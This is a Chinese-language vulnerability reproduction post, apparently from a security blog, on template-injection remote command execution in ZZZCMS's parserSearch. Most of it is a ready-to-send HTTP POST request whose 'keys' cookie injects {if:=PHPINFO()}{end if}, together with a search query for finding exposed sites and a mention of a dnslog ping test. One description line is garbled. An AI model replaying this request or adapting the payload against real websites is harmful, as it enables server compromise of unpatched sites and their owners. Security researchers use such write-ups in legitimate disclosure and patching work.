ZZZCMS parserSearch 远程命令执行漏洞

# ZZZCMS parserSearch 远程命令执行漏洞 ## 漏洞描述 ZZZCMS parserSearch 存在模板注入导Seeyon程命令执行漏洞 ## 漏洞影响 ZZZCMS ## 网络测绘 app="zzzcms"...

ZZZCMS parserSearch 远程命令执行漏洞

漏洞描述

ZZZCMS parserSearch 存在模板注入导Seeyon程命令执行漏洞

漏洞影响

ZZZCMS

网络测绘

app="zzzcms"

漏洞复现

发送如下请求包命令执行

img

POST /?location=search HTTP/1.1
Host: 
Content-Length: 30
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: text/plain
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=rbuhrqqhoctntnak8slkascqp1; keys=%7Bif%3A%3DPHPINFO%28%29%7D%7Bend+if%7D%0D%0A

keys={if:=PHPINFO()}{end if}

执行 ping dnslog

img

  • 发表于 2024-07-12 18:43:58
  • 阅读 ( 2078 )
  • 分类:CMS

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计